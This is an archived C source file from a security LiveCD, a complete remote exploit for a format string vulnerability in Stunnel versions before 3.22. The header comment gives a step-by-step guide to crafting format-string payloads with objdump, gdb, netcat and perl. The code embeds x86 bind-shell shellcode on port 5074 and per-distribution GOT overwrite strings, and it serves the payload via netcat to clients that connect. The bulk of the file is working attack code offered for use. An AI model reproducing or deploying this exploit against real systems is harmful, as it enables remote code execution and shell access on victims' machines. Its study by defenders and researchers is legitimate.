Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / vpn / stunnel / w00nf-stunnel.c < prev

Wrap

C/C++ Source or Header | 2005-02-12 | 18.1 KB | 381 lines

/* * Stunnel < 3.22 remote exploit * by ^sq/w00nf - deltha [at] analog.ro * Contact: deltha@analog.ro * Webpage: http://www.w00nf.org/^sq/ * * ey ./w00nf-stunnel contribs - kewlthanx : * nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero * * You also need netcat and format strings build utility (from my webpage) * Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c * * . . .. ......................................... ... * . ____ ____ _____ :.:.: * : _ __/ __ \/ __ \____ / __/ :.. * :.. | | /| / / / / / / / / __ \/ /_ : * ..:.. | |/ |/ / /_/ / /_/ / / / / __/ : * :.: :.. |__/|__/\____/\____/_/ /_/_/ . * : : :.. * :.: :............................................... .. . . * T . E . A . M * * POC - Tested remotely on linux * Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL * Visit http://www.stunnel.org for details * * I didn't add a search function or bruteforce attack because the vulnerability does'nt allow you * to grab the remote stack. * * Description of this exploit: * This exploit puts a payload on a specified port. When a remote user connects to your machine * using stunnel on the specified port, the exploit executes this payload and binds a shell to the * remote users machine on port 5074. * * Summary: * Malicious servers could potentially run code as the owner of an Stunnel process when using * Stunnel's protocol negotiation feature in client mode. * * Description of vulnerability: * Stunnel is an SSL wrapper able to act as an SSL client or server, * enabling non-SSL aware applications and servers to utilize SSL encryption. * In addition, Stunnel has the ability to perform as simple SSL encryption/decryption * engine. Stunnel can negotiate SSL with several other protocols, such as * SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so * requires that Stunnel watches the initial protocol handshake before * beginning the SSL session. * There are format string bugs in each of the smtp, pop, and nntp * client negotiations as supplied with Stunnel versions 3.3 up to 3.21c. * * No exploit is currently known, but the bugs are most likely exploitable. * * Impact: * If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options * in client mode ('-c'), a malicous server could abuse the format * string bug to run arbitrary code as the owner of the Stunnel * process. The user that runs Stunnel depends on how you start * Stunnel. It may or may not be root -- you will need to check * how you invoke Stunnel to be sure. * There is no vulnerability unless you are invoking Stunnel with * the '-n smtp', '-n pop', or '-n nntp' options in client mode. * There are no format string bugs in Stunnel when it is running as an SSL * server. * * Mitigating factors: * If you start Stunnel as root but have it change userid to some other * user using the '-s username' option, the Stunnel process will be * running as 'username' instead of root when this bug is triggered. * If this is the case, the attacker can still trick your Stunnel process * into running code as 'username', but not as root. * Where possible, we suggest running Stunnel as a non-root user, either * using the '-s' option or starting it as a non-privileged user. * * Triggering this vulnerability - example for kidz: * Obtain a shell account on to-be-hacked's server and perform the following commands: * sq@cal013102: whereis stunnel * stunnel: /usr/sbin/stunnel * change directory to where is stunnel * Obtain vsnprintf's R_386_JUMP_SLOT: * sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf * 08053470 R_386_JUMP_SLOT fprintf * ---->080534a8 R_386_JUMP_SLOT vsnprintf * 080535a4 R_386_JUMP_SLOT snprintf * 08053620 R_386_JUMP_SLOT sprintf * open 2 terminals * in the first terminal make netcat connect to a port (eg 252525) * sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l * in the second terminal (remote) simulate attack * ./stunnel -c -n smtp -r localhost:252525 * in the first terminal with nc insert a specially crafted string to grep eatstack value * AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x| * in the second terminal (remote) it will return the stack values and see at which position * 41414141 and 424242 appeared * AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4| * 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c| * 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10 * try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242 * put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08 * (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b * with build, a program attached to this exploit. * ./build 080534a8 0xbffff89b 9 * adr : 134558888 (80534a8) * val : -1073743717 (bffff89b) * valh: 49151 (bfff) * vall: 63643 (f89b) * [¬¿%.49143x%9$hn%.14492x%10$hn] (35) * ¬¿%.49143x%9$hn%.14492x%10$hn * The resulting string is %.49143x%9$hn%.14492x%10$hn -> * "'`%.32759u%9\$hn%.32197u%10\$hn replace eatstack 10 with 9 otherwise it won't work * eg "'`%.32759u%10\$hn%.32197u%9\$hn * Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x * Bind the payload to a port ./netcat -p 252525 -l <x * Simulate the payload attack ./stunnel -c -n smtp -r localhost:252525 * Add your own crafted format in the exploit: * char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf * char fmtYOUROWN[]=""; R_386_JUMP_SLOT vsnprintf * Simulate the payload attack with this exploit ./w00nf-stunnel -t 6 -p 252525 t6 would be your custom payload * after you added your string in the exploit. * If stunnel was compiled with gdb support and you set ulimit -c 9024 or whatever to coredump on your terminal * then stunnel will coredump if you didn't guess the exact stackvalue in the middle of nops. * If stunnel wasn't compiled with gdb support then download it from the stunnel website * and compile with gdb support. * Once you have downloaded it run './configure edit Makefile' , and where you see 'CFLAGS' add '-g -ggdb3' * eg. 'cat Makefile |grep CFLAGS' * CFLAGS=-g -ggdb3 -O2 -Wall -I/usr/local/ssl/include -DVERSION=\"3.20\" -DHAVE_OPENSSL=1 -Dssldir=\"/usr/local/ssl\" * -DPEM_DIR=\"\" -DRANDOM_FILE=\"/dev/urandom\" -DSSLLIB_CS=0 -DHOST=\"i586-pc-linux-gnu\" -DHAVE_LIBDL=1 * DHAVE_LIBPTHREAD=1 -DHAVE_LIBUTIL=1 -DHAVE_LIBWRAP=1 etcetc * Open core in gdb sq@cal013102:~/stunnel-3.20$gdb ./stunnel core.2411 * x/10i $esp and press enter a couple of times till you find 'nop nop nop nop nop nop'. * Get the stack address in the middle of nops, 0xbffff89b is my address * and build (9 is eatstack) again with the ./build utility * Rebuild and repeat. * ./build 080534a8 0xbffff89b 9 * Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x * ./w00nf-stunnel -t 6 -p 252525 t6 is your custom payload and it will bind a shell on 5074 :) * If it worked then add your own crafted format in the exploit * char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf * char fmtYOUROWN[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; R_386_JUMP_SLOT vsnprintf * */ #include <fcntl.h> #include <netdb.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <stdlib.h> #include <memory.h> #include <errno.h> #include <syslog.h> int MAX; char linuxshellcode[] = /* <priv8security>: bind@5074 */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90" /* nop */ "\x90\x90\x90\x90\x90\x90" /* nop */ "\x31\xc0" /* xor %eax,%eax */ "\x50" /* push %eax */ "\x40" /* inc %eax */ "\x89\xc3" /* mov %eax,%ebx */ "\x50" /* push %eax */ "\x40" /* inc %eax */ "\x50" /* push %eax */ "\x89\xe1" /* mov %esp,%ecx */ "\xb0\x66" /* mov $0x66,%al */ "\xcd\x80" /* int $0x80 */ "\x31\xd2" /* xor %edx,%edx */ "\x52" /* push %edx */ "\x66\x68\x13\xd2" /* pushw $0xd213 */ "\x43" /* inc %ebx */ "\x66\x53" /* push %bx */ "\x89\xe1" /* mov %esp,%ecx */ "\x6a\x10" /* push $0x10 */ "\x51" /* push %ecx */ "\x50" /* push %eax */ "\x89\xe1" /* mov %esp,%ecx */ "\xb0\x66" /* mov $0x66,%al */ "\xcd\x80" /* int $0x80 */ "\x40" /* inc %eax */ "\x89\x44\x24\x04" /* mov %eax,0x4(%esp,1) */ "\x43" /* inc %ebx */ "\x43" /* inc %ebx */ "\xb0\x66" /* mov $0x66,%al */ "\xcd\x80" /* int $0x80 */ "\x83\xc4\x0c" /* add $0xc,%esp */ "\x52" /* push %edx */ "\x52" /* push %edx */ "\x43" /* inc %ebx */ "\xb0\x66" /* mov $0x66,%al */ "\xcd\x80" /* int $0x80 */ "\x93" /* xchg %eax,%ebx */ "\x89\xd1" /* mov %edx,%ecx */ "\xb0\x3f" /* mov $0x3f,%al */ "\xcd\x80" /* int $0x80 */ "\x41" /* inc %ecx */ "\x80\xf9\x03" /* cmp $0x3,%cl */ "\x75\xf6" /* jne 80a035d <priv8security+0x3d> */ "\x52" /* push %edx */ "\x68\x6e\x2f\x73\x68" /* push $0x68732f6e */ "\x68\x2f\x2f\x62\x69" /* push $0x69622f2f */ "\x89\xe3" /* mov %esp,%ebx */ "\x52" /* push %edx */ "\x53" /* push %ebx */ "\x89\xe1" /* mov %esp,%ecx */ "\xb0\x0b" /* mov $0xb,%al */ "\xcd\x80"; /* int $0x80 */ char fmtRH72[]="\x50\x71\x05\x08\x52\x71\x05\x08%.49143x%4\$hn%.12881x%3\$hn"; /* 08057150 R_386_JUMP_SLOT vsnprintf */ char fmtRH73[]="\xe8\x69\x05\x08\xea\x69\x05\x08%.49143x%4\$hn%.12982x%3\$hn"; /* 080569e8 R_386_JUMP_SLOT vsnprintf */ char fmtRH80[]="\x28\x69\x05\x08\x2a\x69\x05\x08%.49143x%4\$hn%.12815x%3\$hn"; /* 08056928 R_386_JUMP_SLOT vsprintf */ char fmtMDK90[]="\xf8\x23\x05\x08\xfa\x23\x05\x08%.49143x%4\$hn%.13321x%3\$hn"; /* 080523f8 R_386_JUMP_SLOT vsnprintf */ char fmtSLACK81[]="\xdc\x69\x05\x08\xde\x69\x05\x08%.49143x%10\$hn%.12082x%9\$hn"; /* 080569dc R_386_JUMP_SLOT vsnprintf */ char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; /* 080534a8 R_386_JUMP_SLOT vsnprintf */ char fmtYOUROWN[]=""; /* R_386_JUMP_SLOT vsnprintf */ char c; struct os { int num; char *ost; char *shellcode; char *format; int flag; }; struct os plat[] = { { 0,"Red Hat Linux release 7.2 stunnel-3.20.tar.gz", linuxshellcode,fmtRH72,11 }, { 1,"Red Hat Linux release 7.3 stunnel-3.20.tar.gz", linuxshellcode,fmtRH73,11 }, { 2,"Red Hat Linux release 8.0 stunnel-3.20.tar.gz", linuxshellcode,fmtRH80,11 }, { 3,"Mandrake Linux release 9.0 stunnel-3.20.tar.gz", linuxshellcode,fmtMDK90,11 }, { 4,"Slackware Linux release 8.1 stunnel-3.20.tar.gz", linuxshellcode,fmtSLACK81,5 }, { 5,"Debian GNU release 3.0 stunnel-3.20.tar.bz2", linuxshellcode,fmtDEBIAN30,5 }, { 6,"Your custom distro stunnel-3.20.tar.bz2", linuxshellcode,fmtYOUROWN,5 } }; void usage(char *argument); int main(argc,argv) int argc; char *argv[]; { int type=0; int flag=plat[type].flag; extern char *optarg; int cnt; char newstring[300]; int port = 994; const char* sploitdata_filename = "sploitdata.spl"; static int fd[2]; static pid_t childpid; static char str_port[6]; void write_sploit_data (char* entry) { int fd = open (sploitdata_filename, O_WRONLY | O_CREAT | O_APPEND, 0660); write (fd, entry, strlen (entry)); write (fd, "\n", 1); fsync (fd); close (fd); } if(argc == 1) usage(argv[0]); if(argc == 2) usage(argv[0]); if(argc == 3) usage(argv[0]); while ((c = getopt(argc, argv, "h:p:t:v")) > 0 ){ switch (c) { case 't': type = atoi(optarg); if(type>6) /* 0,1,2,3,4,5,6 */ { (void)usage(argv[0]); } break; case 'p': port = atoi(optarg); break; case 'h': usage(argv[0]); case '?': case ':': exit(-1); } } MAX=strlen(plat[type].format)+strlen(plat[type].shellcode); fprintf(stdout,"Remote exploit for STUNNEL <3.22\nby ^sq/w00nf - deltha [at] analog.ro\n"); fprintf(stdout,"[*] target: %s\n",plat[type].ost); fprintf(stdout,"[*] maxlenght: %d\n", MAX); unlink (sploitdata_filename); strcpy(newstring, plat[type].format); strcat(newstring, plat[type].shellcode); write_sploit_data(newstring); sprintf((char *) &str_port, "%d", port); printf("[*] host: localhost\n"); printf("[*] port: %s\n", str_port); printf("[*] waiting: jackass should connect to our port\n"); printf("[*] next: after he connects press ctrl-c\n"); printf("[*] next: you should try to connect to his port 5074 - nc 1.2.3.4 5074\n"); pipe(fd); if (( childpid=fork())==0) { /* cat is the child */ dup2(fd[1],STDOUT_FILENO); close(fd[0]); close(fd[1]); execl("/bin/cat","cat",sploitdata_filename,NULL); perror("The exec of cat failed"); } else { /* netcat is the parent */ dup2(fd[0], STDIN_FILENO); close(fd[0]); close(fd[1]); execl("/usr/bin/nc", "nc", "-n", "-l", "-p", str_port, NULL); perror("the exec of nc failed"); } printf("[*] next: now you should try to connect to his port 5074\n"); exit(0); } void usage(char *argument) { fprintf(stdout,"Usage: %s -options arguments\n",argument); fprintf(stdout,"Remote exploit for STUNNEL <3.22\n" "by ^sq/w00nf - deltha [at] analog.ro\nUsage: %s [-p <port> -t <targettype>]\n" "\t-p <port> - Local binded port where the remote stunnel connects\n" "\t-t <target> - Target type number\n", argument); fprintf(stdout,"\t-Target Type Number List-\n"); fprintf(stdout," {0} Red Hat Linux release 7.2 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {1} Red Hat Linux release 7.3 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {2} Red Hat Linux release 8.0 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {3} Mandrake Linux release 9.0 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {4} Slackware Linux release 8.1 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {5} Debian GNU release 3.0 " " stunnel-3.20.tar.gz\n"); fprintf(stdout," {6} Your custom distro " " stunnel-3.20.tar.gz\n"); fprintf(stdout," Example1: %s -t 1 -p 252525\n",argument); exit(0); }